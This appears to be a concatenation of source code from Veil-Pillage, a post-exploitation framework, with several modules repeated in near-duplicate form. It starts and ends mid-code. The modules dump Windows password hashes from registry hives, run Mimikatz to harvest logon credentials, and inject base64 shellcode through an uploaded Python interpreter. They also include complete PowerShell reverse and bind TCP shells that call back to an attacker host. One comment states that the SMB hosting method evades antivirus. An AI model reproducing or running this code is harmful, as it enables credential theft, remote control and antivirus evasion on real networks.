password + "' on " + target + " saved to " + saveLocation + "\n" else: self.output += "[!] Error executing hashdump using creds '" + username + ":" + password + "'on " + target + "\n" if allHashes != "": # get all non-empty hashes, uniquify and sort them allHashes = [p.lower() for p in allHashes.split("\n") if p != ''] allHashes = sorted(set(allHashes)) self.output += "[*] All unique hashes:\n" + "\n".join( allHashes) + "\n"
def run(self): # assume single set of credentials for this module username, password = self.creds[0] lhost = self.required_options["lhost"][0] use_ssl = self.required_options["use_ssl"][0] force_method = self.required_options["force_method"][0] delay = self.required_options["delay"][0] out_file = self.required_options["out_file"][0] # let's keep track of all credentials found allhashes, allmsv, allkerberos, allwdigest, alltspkg = [], [], [], [], [] for target in self.targets: powershellInstalled = False # check if we're forcing a particular grab method if force_method.lower() == "binary": powershellInstalled = False elif force_method.lower() == "powershell": powershellInstalled = True else: # check if we have a functional Powershell installation powershellCommand = 'powershell.exe -c "$a=42;$a"' powershellResult = command_methods.executeResult(target, username, password, powershellCommand, "wmis") if powershellResult.strip() == "42": powershellInstalled = True if powershellInstalled: # do powersploit combined file of invoke-mimikatz and powerdump print helpers.color("\n [*] Powershell installed on " + target) self.output += "[*] Powershell installed on " + target + ", using autograb.ps1\n" # the temporary output file we will write to if "\\" not in out_file: # otherwise assume it's an absolute path out_file = "C:\\Windows\\Temp\\" + out_file # path to the combined Invoke-Mimikatz/powerdump powershell script secondStagePath = settings.VEIL_PILLAGE_PATH + "/data/misc/autograb.ps1" # trigger the powershell download on just this target delivery_methods.powershellHostTrigger( target, username, password, secondStagePath, lhost, "", triggerMethod="winexe", outFile=out_file, ssl=use_ssl, noArch=True, ) print "\n [*] Waiting " + delay + "s for Autograb to run..." time.sleep(int(delay)) # grab the output file and delete it out = smb.getFile(target, username, password, out_file, delete=True) # save the file off to the appropriate location saveFile = helpers.saveModuleFile(self, target, "autograb.txt", out) # parse the mimikatz output and append it to our globals (msv1_0, kerberos, wdigest, tspkg) = helpers.parseMimikatz(out) allmsv.extend(msv1_0) allkerberos.extend(kerberos) allwdigest.extend(wdigest) alltspkg.extend(tspkg) # parse the powerdump component hashes = helpers.parseHashdump(out) allhashes.extend(hashes) if out != "": self.output += ( "[*] Autograb.ps1 results using creds '" + username + ":" + password + "' on " + target + " stored at " + saveFile + "\n" ) else: self.output += ( "[!] Autograb.ps1 failed using creds '" + username + ":" + password + "' on " + target + " : no result file\n" ) else: # do reg.exe for hashdump and host/execute for mimikatz print helpers.color("\n [!] Powershell not installed on " + target, warning=True) print helpers.color("\n [*] Using reg.exe save method for hash dumping on " + target) self.output += "[!] Powershell not installed on " + target + "\n" # reg.exe command to save off the hives regSaveCommand = "reg save HKLM\\SYSTEM C:\\Windows\\Temp\\system /y && reg save HKLM\\SECURITY C:\\Windows\\Temp\\security /y && reg save HKLM\\SAM C:\\Windows\\Temp\\sam /y" # execute the registry save command command_methods.executeCommand(target, username, password, regSaveCommand, "wmis") print helpers.color("\n [*] Dumping hashes on " + target) # sleep for 5 seconds to let everything backup time.sleep(5) # grab all of the backed up files systemFile = smb.getFile(target, username, password, "C:\\Windows\\Temp\\system", delete=False) securityFile = smb.getFile(target, username, password, "C:\\Windows\\Temp\\security", delete=False) samFile = smb.getFile(target, username, password, "C:\\Windows\\Temp\\sam", delete=False) # more error-checking here? if systemFile == "": self.output += "[!] File '" + systemFile + "' from " + target + " empty or doesn't exist\n" else: f = open("/tmp/system", "w") f.write(systemFile) f.close() if securityFile == "": self.output += "[!] File '" + securityFile + "' from " + target + " empty or doesn't exist\n" else: f = open("/tmp/security", "w") f.write(securityFile) f.close() if samFile == "": self.output += "[!] File '" + samFile + "' from " + target + " empty or doesn't exist\n" else: f = open("/tmp/sam", "w") f.write(samFile) f.close() # get all the hashes from these hives out = creddump.dump_file_hashes("/tmp/system", "/tmp/sam") # save the output file off saveLocation = helpers.saveModuleFile(self, target, "creddump.txt", out) self.output += ( "[*] dumped hashes (reg.exe) using creds '" + username + ":" + password + "' on " + target + " saved to " + saveLocation + "\n" ) # save these off to the universal list hashes = helpers.parseHashdump(out) allhashes.extend(hashes) # now, detect the architecture archCommand = "echo %PROCESSOR_ARCHITECTURE%" archResult = command_methods.executeResult(target, username, password, archCommand, "wmis") arch = "x86" if "64" in archResult: arch = "x64" # now time for ze mimikatz! mimikatzPath = settings.VEIL_PILLAGE_PATH + "/data/misc/mimikatz" + arch + ".exe" # the temporary output file we will write to if "\\" not in out_file: # otherwise assume it's an absolute path out_file = "C:\\Windows\\Temp\\" + out_file exeArgs = '"sekurlsa::logonPasswords full" "exit" >' + out_file # host mimikatz.exe and trigger it ONLY on this particular machine # so we can get the architecture correct delivery_methods.hostTrigger( target, username, password, mimikatzPath, lhost, triggerMethod="wmis", exeArgs=exeArgs ) print "\n [*] Waiting " + delay + "s for Mimikatz to run..." time.sleep(int(delay)) # grab the output file and delete it out = smb.getFile(target, username, password, out_file, delete=True) # parse the mimikatz output and append it to our globals (msv1_0, kerberos, wdigest, tspkg) = helpers.parseMimikatz(out) allmsv.extend(msv1_0) allkerberos.extend(kerberos) allwdigest.extend(wdigest) alltspkg.extend(tspkg) # save the file off to the appropriate location saveFile = helpers.saveModuleFile(self, target, "mimikatz.txt", out) if out != "": self.output += ( "[*] Mimikatz results using creds '" + username + ":" + password + "' on " + target + " stored at " + saveFile + "\n" ) else: self.output += ( "[!] Mimikatz failed using creds '" + username + ":" + password + "' on " + target + " : no result file\n" ) if len(allhashes) > 0: allhashes = sorted(set(allhashes)) self.output += "[*] All unique hashes:\n\t" + "\n\t".join(allhashes) + "\n" if len(allmsv) > 0: allmsv = sorted(set(allmsv)) self.output += "[*] All msv1_0:\n\t" + "\n\t".join(allmsv) + "\n" if len(allkerberos) > 0: allkerberos = sorted(set(allkerberos)) self.output += "[*] All kerberos:\n\t" + "\n\t".join(allkerberos) + "\n" if len(allwdigest) > 0: allwdigest = sorted(set(allwdigest)) self.output += "[*] All wdigest:\n\t" + "\n\t".join(allwdigest) + "\n" if len(alltspkg) > 0: alltspkg = sorted(set(alltspkg)) self.output += "[*] All tspkg:\n\t" + "\n\t".join(alltspkg) + "\n"
def hostTrigger(targets, username, password, exePath, localHost, triggerMethod="wmis", exeArgs=""): """ Spins up an Impacket SMB server and hosts the binary specified by exePath. The specified triggerMethod (default wmis) is then used to invoke a command with the UNC path "\\localHost\\exe" which will invoke the specified executable purely in memory. Note: this evades several AV vendors, even with normally disk-detectable executables #avlol :) This takes 'targets' instead of a single 'target' since we don't want to set up and tear down the local SMB server every time. """ # if we get a single target, make it into a list if type(targets) is str: targets = [targets] # randomize the hosted .exe file name hostedFileName = helpers.randomString() + ".exe" # make the tmp hosting directory if it doesn't already exist if not os.path.exists(settings.TEMP_DIR + "shared/"): os.makedirs(settings.TEMP_DIR + "shared/") # copy the payload to the random hostedFileName in the temp directory os.system("cp " + exePath + " /" + settings.TEMP_DIR + "/shared/" + hostedFileName) # spin up the SMB server server = smb.ThreadedSMBServer() server.start() time.sleep(.5) # build the UNC path back to our host and executable and any specified arguments cmd = "\\\\" + localHost + "\\system\\" + hostedFileName + " " + exeArgs for target in targets: # execute the UNC command for each target command_methods.executeCommand(target, username, password, cmd, triggerMethod) print helpers.color("\n [*] Giving time for commands to trigger...") # sleep so the wmis/winexe commands can trigger and the target # can grab the .exe from the SMB server time.sleep(10) # shut the smb server down server.shutdown() # remove the temporarily hosted files os.system("rm -rf " + settings.TEMP_DIR + "/shared/") # not sure if need to do this to kill off the smb server... # os.kill(os.getpid(), signal.SIGINT) ? # return the randomized name in the calling method later wants # to clean the processes up return hostedFileName
def run(self): handlerPath = "none" # assume single set of credentials username, password = self.creds[0] triggerMethod = self.required_options["trigger_method"][0] spawnHandler = self.required_options["spawn_handler"][0] # nab up some shellcode from Veil-Evasion sc = shellcode.Shellcode() # set the payload to use, if specified if self.args.msfpayload: sc.SetPayload([self.args.msfpayload, self.args.msfoptions]) # set custom shellcode if specified elif self.args.custshell: sc.setCustomShellcode(self.args.custshell) # base64 our shellcode b64sc = base64.b64encode(sc.generate().decode("string_escape")) # re-print the title and module name after shellcode generation (Veil-Evasion trashes this) messages.title() sys.stdout.write(" [*] Executing module: " + helpers.color(self.name) + "...") # if we're using Veil-Evasion's generated handler script, try to spawn it if spawnHandler.lower() == "true": # turn our shellcode object into a handler script handlerPath = helpers.shellcodeToHandler(sc) # make sure a handler was returned if handlerPath != "": # command to spawn a new tab cmd = "gnome-terminal --tab -t \"Veil-Pillage Handler\" -x bash -c \"echo ' [*] Spawning Metasploit handler...' && msfconsole -r '" + handlerPath + "'\"" # invoke msfconsole with the handler script in a new tab os.system(cmd) raw_input("\n\n [>] Press enter when handler is ready: ") # otherwise, if we have a custom handler path, try to invoke that elif handlerPath.lower() != "none": if os.path.isdir(handlerPath): # command to spawn a new tab cmd = "gnome-terminal --tab -t \"Veil-Pillage Handler\" -x bash -c \"echo ' [*] Spawning Metasploit handler...' && msfconsole -r '" + handlerPath + "'\"" # invoke msfconsole with the handler script in a new tab os.system(cmd) raw_input("\n [>] Press enter when handler is ready: ") else: print helpers.color(" [!] Warning: handlerPath '" + handlerPath + "' not valid!") else: pass # command to unzip the uploaded python installation unzipCommand = "C:\\\\Windows\\\\Temp\\\\7za.exe x -y -oC:\\\\Windows\\\\Temp\\\\ C:\\\\Windows\\\\Temp\\\\python.zip" # path to the 7zip binary zipPath = settings.VEIL_PILLAGE_PATH + "/data/environments/7za.exe" # command to invoke shellcode using python pythonCMD = "C:\\\\Windows\\\\Temp\\\\python\\\\python.exe -c \"from ctypes import *;a=\\\"%s\\\".decode(\\\"base_64\\\");cast(create_string_buffer(a,len(a)),CFUNCTYPE(c_void_p))()\"" % ( b64sc) # path to the minial python isntall pythonPath = settings.VEIL_PILLAGE_PATH + "/data/environments/python.zip" for target in self.targets: # upload the 7zip.exe binary and the python install uploadResult = smb.uploadFiles(target, username, password, "C$", "\\Windows\\Temp\\", [zipPath, pythonPath]) if uploadResult == "success": self.output += "[*] 7za.exe and python.zip successfully uploaded using creds '" + username + ":" + password + "' on " + target + "\n" print helpers.color(" [*] Triggering 7zip unzip command on " + target) command_methods.executeCommand(target, username, password, unzipCommand, triggerMethod) self.output += "[*] 7za unzip command triggered using creds '" + username + ":" + password + "' on " + target + " with " + triggerMethod + "\n" print helpers.color(" [*] Triggering 'python -c' command on " + target) command_methods.executeCommand(target, username, password, pythonCMD, triggerMethod) self.output += "[*] 'python -c' inject command triggered using creds '" + username + ":" + password + "' on " + target + " with " + triggerMethod + "\n" # build our cleanup file -> kill all python processes and delete the environments killCMD = "taskkill /f /im python.exe" self.cleanup += "executeCommand|" + target + "|" + username + "|" + password + "|" + killCMD + "|" + triggerMethod + "\n" # command to delete the python extracted directory, zipped python environment and 7za.exe binary delCMD = "rmdir c:\\Windows\\Temp\\Python /s /q & del C:\\Windows\\Temp\\python.zip & del C:\\Windows\\Temp\\7za.exe" self.cleanup += "executeCommand|" + target + "|" + username + "|" + password + "|" + delCMD + "|" + triggerMethod + "\n" else: self.output += "[!] 7za.exe and python.zip unsuccessfully uploaded using creds '" + username + ":" + password + "' on " + target + "\n" print helpers.color( "[!] 7za.exe and python.zip unsuccessfully uploaded to " + target + "\n", warning=True)
def run(self): handlerPath = "none" # assume single set of credentials username, password = self.creds[0] triggerMethod = self.required_options["trigger_method"][0] spawnHandler = self.required_options["spawn_handler"][0] # nab up some shellcode from Veil-Evasion sc = shellcode.Shellcode() # set the payload to use, if specified if self.args.msfpayload: sc.SetPayload([self.args.msfpayload, self.args.msfoptions]) # set custom shellcode if specified elif self.args.custshell: sc.setCustomShellcode(self.args.custshell) # base64 our shellcode b64sc = base64.b64encode(sc.generate().decode("string_escape")) # re-print the title and module name after shellcode generation (Veil-Evasion trashes this) messages.title() sys.stdout.write(" [*] Executing module: " + helpers.color(self.name) + "...") # if we're using Veil-Evasion's generated handler script, try to spawn it if spawnHandler.lower() == "true": # turn our shellcode object into a handler script handlerPath = helpers.shellcodeToHandler(sc) # make sure a handler was returned if handlerPath != "": # command to spawn a new tab cmd = "gnome-terminal --tab -t \"Veil-Pillage Handler\" -x bash -c \"echo ' [*] Spawning Metasploit handler...' && msfconsole -r '" + handlerPath + "'\"" # invoke msfconsole with the handler script in a new tab os.system(cmd) raw_input("\n\n [>] Press enter when handler is ready: ") # otherwise, if we have a custom handler path, try to invoke that elif handlerPath.lower() != "none": if os.path.isdir(handlerPath): # command to spawn a new tab cmd = "gnome-terminal --tab -t \"Veil-Pillage Handler\" -x bash -c \"echo ' [*] Spawning Metasploit handler...' && msfconsole -r '" + handlerPath + "'\"" # invoke msfconsole with the handler script in a new tab os.system(cmd) raw_input("\n [>] Press enter when handler is ready: ") else: print helpers.color(" [!] Warning: handlerPath '"+handlerPath+"' not valid!") else: pass # command to unzip the uploaded python installation unzipCommand = "C:\\\\Windows\\\\Temp\\\\7za.exe x -y -oC:\\\\Windows\\\\Temp\\\\ C:\\\\Windows\\\\Temp\\\\python.zip" # path to the 7zip binary zipPath = settings.VEIL_PILLAGE_PATH+"/data/environments/7za.exe" # command to invoke shellcode using python pythonCMD = "C:\\\\Windows\\\\Temp\\\\python\\\\python.exe -c \"from ctypes import *;a=\\\"%s\\\".decode(\\\"base_64\\\");cast(create_string_buffer(a,len(a)),CFUNCTYPE(c_void_p))()\"" %(b64sc) # path to the minial python isntall pythonPath = settings.VEIL_PILLAGE_PATH+"/data/environments/python.zip" for target in self.targets: # upload the 7zip.exe binary and the python install uploadResult = smb.uploadFiles(target, username, password, "C$", "\\Windows\\Temp\\", [zipPath, pythonPath]) if uploadResult == "success": self.output += "[*] 7za.exe and python.zip successfully uploaded using creds '"+username+":"+password+"' on "+target+"\n" print helpers.color(" [*] Triggering 7zip unzip command on " + target) command_methods.executeCommand(target, username, password, unzipCommand, triggerMethod) self.output += "[*] 7za unzip command triggered using creds '"+username+":"+password+"' on "+target+" with "+triggerMethod+"\n" print helpers.color(" [*] Triggering 'python -c' command on " + target) command_methods.executeCommand(target, username, password, pythonCMD, triggerMethod) self.output += "[*] 'python -c' inject command triggered using creds '"+username+":"+password+"' on "+target+" with "+triggerMethod+"\n" # build our cleanup file -> kill all python processes and delete the environments killCMD = "taskkill /f /im python.exe" self.cleanup += "executeCommand|"+target+"|"+username+"|"+password+"|"+killCMD+"|"+triggerMethod+"\n" # command to delete the python extracted directory, zipped python environment and 7za.exe binary delCMD = "rmdir c:\\Windows\\Temp\\Python /s /q & del C:\\Windows\\Temp\\python.zip & del C:\\Windows\\Temp\\7za.exe" self.cleanup += "executeCommand|"+target+"|"+username+"|"+password+"|"+delCMD+"|"+triggerMethod+"\n" else: self.output += "[!] 7za.exe and python.zip unsuccessfully uploaded using creds '"+username+":"+password+"' on "+target+"\n" print helpers.color("[!] 7za.exe and python.zip unsuccessfully uploaded to "+target+"\n", warning=True)
def run(self): # assume single set of credentials for this module username, password = self.creds[0] triggerMethod = self.required_options["trigger_method"][0] # let's keep track of ALL hashes found allHashes = "" # reg.exe command to save off the hives regSaveCommand = "reg save HKLM\\SYSTEM C:\\Windows\\Temp\\system /y && reg save HKLM\\SECURITY C:\\Windows\\Temp\\security /y && reg save HKLM\\SAM C:\\Windows\\Temp\\sam /y" for target in self.targets: print helpers.color("\n [*] Dumping hashes on " + target) # execute the registry save command command_methods.executeCommand(target, username, password, regSaveCommand, triggerMethod) # sleep for 5 seconds to let everything backup time.sleep(5) # grab all of the backed up files systemFile = smb.getFile(target, username, password, "C:\\Windows\\Temp\\system", delete=False) securityFile = smb.getFile(target, username, password, "C:\\Windows\\Temp\\security", delete=False) samFile = smb.getFile(target, username, password, "C:\\Windows\\Temp\\sam", delete=False) error = False if systemFile == "": self.output += "[!] File '" + systemFile + "' from " + target + " empty or doesn't exist\n" error = True else: f = open("/tmp/system", "w") f.write(systemFile) f.close() if securityFile == "": self.output += "[!] File '" + securityFile + "' from " + target + " empty or doesn't exist\n" else: f = open("/tmp/security", "w") f.write(securityFile) f.close() if samFile == "": self.output += "[!] File '" + samFile + "' from " + target + " empty or doesn't exist\n" error = True else: f = open("/tmp/sam", "w") f.write(samFile) f.close() if not error: # get all the hashes from these hives hashes = creddump.dump_file_hashes("/tmp/system", "/tmp/sam") # add the hashes to our global list allHashes += hashes # save off the file to PILLAGE_OUTPUT_PATH/hashdump/target/hashes.txt saveLocation = helpers.saveModuleFile(self, target, "hashes.txt", hashes) self.output += ( "[*] dumped hashes (reg.exe) using creds '" + username + ":" + password + "' on " + target + " saved to " + saveLocation + "\n" ) else: self.output += ( "[!] Error executing hashdump using creds '" + username + ":" + password + "'on " + target + "\n" ) if allHashes != "": # get all non-empty hashes, uniquify and sort them allHashes = [p.lower() for p in allHashes.split("\n") if p != ""] allHashes = sorted(set(allHashes)) self.output += "[*] All unique hashes:\n" + "\n".join(allHashes) + "\n"
def run(self): # assume single set of credentials for this module username, password = self.creds[0] lhost = self.required_options["lhost"][0] use_ssl = self.required_options["use_ssl"][0] force_method = self.required_options["force_method"][0] delay = self.required_options["delay"][0] out_file = self.required_options["out_file"][0] # let's keep track of all credentials found allhashes, allmsv, allkerberos, allwdigest, alltspkg = [], [], [], [], [] for target in self.targets: powershellInstalled = False # check if we're forcing a particular grab method if force_method.lower() == "binary": powershellInstalled = False elif force_method.lower() == "powershell": powershellInstalled = True else: # check if we have a functional Powershell installation powershellCommand = "powershell.exe -c \"$a=42;$a\"" powershellResult = command_methods.executeResult( target, username, password, powershellCommand, "wmis") if powershellResult.strip() == "42": powershellInstalled = True if powershellInstalled: # do powersploit combined file of invoke-mimikatz and powerdump print helpers.color("\n [*] Powershell installed on " + target) self.output += "[*] Powershell installed on " + target + ", using autograb.ps1\n" # the temporary output file we will write to if "\\" not in out_file: # otherwise assume it's an absolute path out_file = "C:\\Windows\\Temp\\" + out_file # path to the combined Invoke-Mimikatz/powerdump powershell script secondStagePath = settings.VEIL_PILLAGE_PATH + "/data/misc/autograb.ps1" # trigger the powershell download on just this target delivery_methods.powershellHostTrigger(target, username, password, secondStagePath, lhost, "", triggerMethod="winexe", outFile=out_file, ssl=use_ssl, noArch=True) print "\n [*] Waiting " + delay + "s for Autograb to run..." time.sleep(int(delay)) # grab the output file and delete it out = smb.getFile(target, username, password, out_file, delete=True) # save the file off to the appropriate location saveFile = helpers.saveModuleFile(self, target, "autograb.txt", out) # parse the mimikatz output and append it to our globals (msv1_0, kerberos, wdigest, tspkg) = helpers.parseMimikatz(out) allmsv.extend(msv1_0) allkerberos.extend(kerberos) allwdigest.extend(wdigest) alltspkg.extend(tspkg) # parse the powerdump component hashes = helpers.parseHashdump(out) allhashes.extend(hashes) if out != "": self.output += "[*] Autograb.ps1 results using creds '" + username + ":" + password + "' on " + target + " stored at " + saveFile + "\n" else: self.output += "[!] Autograb.ps1 failed using creds '" + username + ":" + password + "' on " + target + " : no result file\n" else: # do reg.exe for hashdump and host/execute for mimikatz print helpers.color("\n [!] Powershell not installed on " + target, warning=True) print helpers.color( "\n [*] Using reg.exe save method for hash dumping on " + target) self.output += "[!] Powershell not installed on " + target + "\n" # reg.exe command to save off the hives regSaveCommand = "reg save HKLM\\SYSTEM C:\\Windows\\Temp\\system /y && reg save HKLM\\SECURITY C:\\Windows\\Temp\\security /y && reg save HKLM\\SAM C:\\Windows\\Temp\\sam /y" # execute the registry save command command_methods.executeCommand(target, username, password, regSaveCommand, "wmis") print helpers.color("\n [*] Dumping hashes on " + target) # sleep for 5 seconds to let everything backup time.sleep(5) # grab all of the backed up files systemFile = smb.getFile(target, username, password, "C:\\Windows\\Temp\\system", delete=False) securityFile = smb.getFile(target, username, password, "C:\\Windows\\Temp\\security", delete=False) samFile = smb.getFile(target, username, password, "C:\\Windows\\Temp\\sam", delete=False) # more error-checking here? if systemFile == "": self.output += "[!] File '" + systemFile + "' from " + target + " empty or doesn't exist\n" else: f = open('/tmp/system', 'w') f.write(systemFile) f.close() if securityFile == "": self.output += "[!] File '" + securityFile + "' from " + target + " empty or doesn't exist\n" else: f = open('/tmp/security', 'w') f.write(securityFile) f.close() if samFile == "": self.output += "[!] File '" + samFile + "' from " + target + " empty or doesn't exist\n" else: f = open('/tmp/sam', 'w') f.write(samFile) f.close() # get all the hashes from these hives out = creddump.dump_file_hashes("/tmp/system", "/tmp/sam") # save the output file off saveLocation = helpers.saveModuleFile(self, target, "creddump.txt", out) self.output += "[*] dumped hashes (reg.exe) using creds '" + username + ":" + password + "' on " + target + " saved to " + saveLocation + "\n" # save these off to the universal list hashes = helpers.parseHashdump(out) allhashes.extend(hashes) # now, detect the architecture archCommand = "echo %PROCESSOR_ARCHITECTURE%" archResult = command_methods.executeResult( target, username, password, archCommand, "wmis") arch = "x86" if "64" in archResult: arch = "x64" # now time for ze mimikatz! mimikatzPath = settings.VEIL_PILLAGE_PATH + "/data/misc/mimikatz" + arch + ".exe" # the temporary output file we will write to if "\\" not in out_file: # otherwise assume it's an absolute path out_file = "C:\\Windows\\Temp\\" + out_file exeArgs = "\"sekurlsa::logonPasswords full\" \"exit\" >" + out_file # host mimikatz.exe and trigger it ONLY on this particular machine # so we can get the architecture correct delivery_methods.hostTrigger(target, username, password, mimikatzPath, lhost, triggerMethod="wmis", exeArgs=exeArgs) print "\n [*] Waiting " + delay + "s for Mimikatz to run..." time.sleep(int(delay)) # grab the output file and delete it out = smb.getFile(target, username, password, out_file, delete=True) # parse the mimikatz output and append it to our globals (msv1_0, kerberos, wdigest, tspkg) = helpers.parseMimikatz(out) allmsv.extend(msv1_0) allkerberos.extend(kerberos) allwdigest.extend(wdigest) alltspkg.extend(tspkg) # save the file off to the appropriate location saveFile = helpers.saveModuleFile(self, target, "mimikatz.txt", out) if out != "": self.output += "[*] Mimikatz results using creds '" + username + ":" + password + "' on " + target + " stored at " + saveFile + "\n" else: self.output += "[!] Mimikatz failed using creds '" + username + ":" + password + "' on " + target + " : no result file\n" if len(allhashes) > 0: allhashes = sorted(set(allhashes)) self.output += "[*] All unique hashes:\n\t" + "\n\t".join( allhashes) + "\n" if len(allmsv) > 0: allmsv = sorted(set(allmsv)) self.output += "[*] All msv1_0:\n\t" + "\n\t".join(allmsv) + "\n" if len(allkerberos) > 0: allkerberos = sorted(set(allkerberos)) self.output += "[*] All kerberos:\n\t" + "\n\t".join( allkerberos) + "\n" if len(allwdigest) > 0: allwdigest = sorted(set(allwdigest)) self.output += "[*] All wdigest:\n\t" + "\n\t".join( allwdigest) + "\n" if len(alltspkg) > 0: alltspkg = sorted(set(alltspkg)) self.output += "[*] All tspkg:\n\t" + "\n\t".join(alltspkg) + "\n"
def run(self): # assume single set of credentials username, password = self.creds[0] triggerMethod = self.required_options["trigger_method"][0] shell = self.required_options["shell"][0] lhost = self.required_options["lhost"][0] lport = self.required_options["lport"][0] spawnHandler = self.required_options["spawn_handler"][0] # start building the handler in case we want to invoke it handler = "use exploit/multi/handler" # the pure powershell windows_reverse_tcp shell revTCPShell = """function cleanup { if ($c.Connected -eq $true) {$c.Close()} if ($p.ExitCode -ne $null) {$p.Close()} exit} $c = New-Object system.net.sockets.tcpclient $c.connect('%s','%s') $stream = $c.GetStream() $n = New-Object System.Byte[] $c.ReceiveBufferSize $p = New-Object System.Diagnostics.Process $p.StartInfo.FileName = 'C:\\windows\\system32\\cmd.exe' $p.StartInfo.RedirectStandardInput = 1 $p.StartInfo.RedirectStandardOutput = 1 $p.StartInfo.UseShellExecute = 0 $p.Start() $is = $p.StandardInput $o = $p.StandardOutput Start-Sleep 1 $encoding = new-object System.Text.AsciiEncoding while($o.Peek() -ne -1){$out += $encoding.GetString($o.Read())} $stream.Write($encoding.GetBytes($out),0,$out.Length) $out = $null; $done = $false; while (-not $done) { if ($c.Connected -ne $true) {cleanup} $pos = 0; $i = 1 while (($i -gt 0) -and ($pos -lt $n.Length)) { $read = $stream.Read($n,$pos,$n.Length - $pos) $pos+=$read; if ($pos -and ($n[0..$($pos-1)] -contains 10)) {break}} if ($pos -gt 0) { $string = $encoding.GetString($n,0,$pos) $is.write($string) start-sleep 1 if ($p.ExitCode -ne $null) {cleanup} else { $out = $encoding.GetString($o.Read()) while($o.Peek() -ne -1){ $out += $encoding.GetString($o.Read()); if ($out -eq $string) {$out = ''}} $stream.Write($encoding.GetBytes($out),0,$out.length) $out = $null $string = $null}} else {cleanup}}""" % (lhost, lport) bindTCPShell = """$en = new-object System.Text.AsciiEncoding $ep = new-object System.Net.IpEndpoint ([System.Net.Ipaddress]::any, "%s") $l = new-object System.Net.Sockets.TcpListener $ep $l.start() $socket = $l.AcceptTcpClient() $ns = $socket.GetStream() $nb = New-Object System.Byte[] $socket.ReceiveBufferSize $p = New-Object System.Diagnostics.Process $p.StartInfo.FileName = "C:\\windows\\system32\\cmd.exe" $p.StartInfo.RedirectStandardInput = 1 $p.StartInfo.RedirectStandardOutput = 1 $p.StartInfo.UseShellExecute = 0 $p.Start() $is = $p.StandardInput $os = $p.StandardOutput Start-Sleep 1 while($os.Peek() -ne -1){ $string += $en.GetString($os.Read())} $ns.Write($en.GetBytes($string),0,$string.Length) $string = '' $done = $false while (-not $done) { $pos = 0 $i = 1 while (($i -gt 0) -and ($pos -lt $nb.Length)) { $read = $ns.Read($nb,$pos,$nb.Length - $pos) $pos+=$read if ($pos -and ($nb[0..$($pos-1)] -contains 10)){break}} if ($pos -gt 0) { $string = $en.GetString($nb,0,$pos) $is.write($string) $out = $en.GetString($os.Read()) while($os.Peek() -ne -1){$out += $en.GetString($os.Read())} $ns.Write($en.GetBytes($out),0,$out.length) $out = $null} else {$done = $true}} """ % (lport) # if the user specific a reverse_tcp shell if shell.lower() == "rev_tcp": # make sure we have lhost filled in if lhost == "none": print helpers.color(" [!] 'lhost' required for rev_tcp! ", warning=True) raw_input("\n [>] Press enter to continue: ") return "" # get the encoded powershell trigger command triggerCMD = helpers.encPowershell(revTCPShell) handler += "\nset PAYLOAD windows/shell_reverse_tcp" handler += "\nset LHOST " + lhost handler += "\nset LPORT " + lport handler += "\nset ExitOnSession false" handler += "\nexploit -j\n" f = open('/tmp/handler.rc', 'w') f.write(handler) f.close() # build and spawn a handler for the reverse shell if spawnHandler.lower() == "true": handlerPath = "/tmp/handler.rc" # command to spawn a new tab cmd = "gnome-terminal --tab -t \"Veil-Pillage Handler\" -x bash -c \"echo ' [*] Spawning Metasploit handler...' && msfconsole -r '" + handlerPath + "'\"" # invoke msfconsole with the handler script in a new tab os.system(cmd) raw_input("\n\n [>] Press enter when handler is ready: ") # bind_tco shell is easier :) elif shell.lower() == "bind_tcp": triggerCMD = helpers.encPowershell(bindTCPShell) else: print helpers.color( "\n [!] Shell not recognized: please enter rev_tcp or bind_tcp\n", warning=True) raw_input("\n [>] Press enter to continue: ") return "" # execute the powershell trigger command on each target for target in self.targets: # trigger the command and set output as appropriate print "\n [*] Triggering powershell shell '" + shell.lower( ) + "' with lhost=" + lhost + " and lport=" + lport + " on " + target self.output += "[*] Triggering powershell shell '" + shell.lower( ) + "' with lhost=" + lhost + " and lport=" + lport + " using creds '" + username + ":" + password + "' on " + target + "\n" command_methods.executeCommand(target, username, password, triggerCMD, triggerMethod) # build our cleanup file -> kill all powershell processes killCMD = "taskkill /f /im powershell.exe" self.cleanup += "executeCommand|" + target + "|" + username + "|" + password + "|" + killCMD + "|" + triggerMethod + "\n"
def run(self): # assume single set of credentials username, password = self.creds[0] triggerMethod = self.required_options["trigger_method"][0] shell = self.required_options["shell"][0] lhost = self.required_options["lhost"][0] lport = self.required_options["lport"][0] spawnHandler = self.required_options["spawn_handler"][0] # start building the handler in case we want to invoke it handler = "use exploit/multi/handler" # the pure powershell windows_reverse_tcp shell revTCPShell = """function cleanup { if ($c.Connected -eq $true) {$c.Close()} if ($p.ExitCode -ne $null) {$p.Close()} exit} $c = New-Object system.net.sockets.tcpclient $c.connect('%s','%s') $stream = $c.GetStream() $n = New-Object System.Byte[] $c.ReceiveBufferSize $p = New-Object System.Diagnostics.Process $p.StartInfo.FileName = 'C:\\windows\\system32\\cmd.exe' $p.StartInfo.RedirectStandardInput = 1 $p.StartInfo.RedirectStandardOutput = 1 $p.StartInfo.UseShellExecute = 0 $p.Start() $is = $p.StandardInput $o = $p.StandardOutput Start-Sleep 1 $encoding = new-object System.Text.AsciiEncoding while($o.Peek() -ne -1){$out += $encoding.GetString($o.Read())} $stream.Write($encoding.GetBytes($out),0,$out.Length) $out = $null; $done = $false; while (-not $done) { if ($c.Connected -ne $true) {cleanup} $pos = 0; $i = 1 while (($i -gt 0) -and ($pos -lt $n.Length)) { $read = $stream.Read($n,$pos,$n.Length - $pos) $pos+=$read; if ($pos -and ($n[0..$($pos-1)] -contains 10)) {break}} if ($pos -gt 0) { $string = $encoding.GetString($n,0,$pos) $is.write($string) start-sleep 1 if ($p.ExitCode -ne $null) {cleanup} else { $out = $encoding.GetString($o.Read()) while($o.Peek() -ne -1){ $out += $encoding.GetString($o.Read()); if ($out -eq $string) {$out = ''}} $stream.Write($encoding.GetBytes($out),0,$out.length) $out = $null $string = $null}} else {cleanup}}""" %(lhost, lport) bindTCPShell = """$en = new-object System.Text.AsciiEncoding $ep = new-object System.Net.IpEndpoint ([System.Net.Ipaddress]::any, "%s") $l = new-object System.Net.Sockets.TcpListener $ep $l.start() $socket = $l.AcceptTcpClient() $ns = $socket.GetStream() $nb = New-Object System.Byte[] $socket.ReceiveBufferSize $p = New-Object System.Diagnostics.Process $p.StartInfo.FileName = "C:\\windows\\system32\\cmd.exe" $p.StartInfo.RedirectStandardInput = 1 $p.StartInfo.RedirectStandardOutput = 1 $p.StartInfo.UseShellExecute = 0 $p.Start() $is = $p.StandardInput $os = $p.StandardOutput Start-Sleep 1 while($os.Peek() -ne -1){ $string += $en.GetString($os.Read())} $ns.Write($en.GetBytes($string),0,$string.Length) $string = '' $done 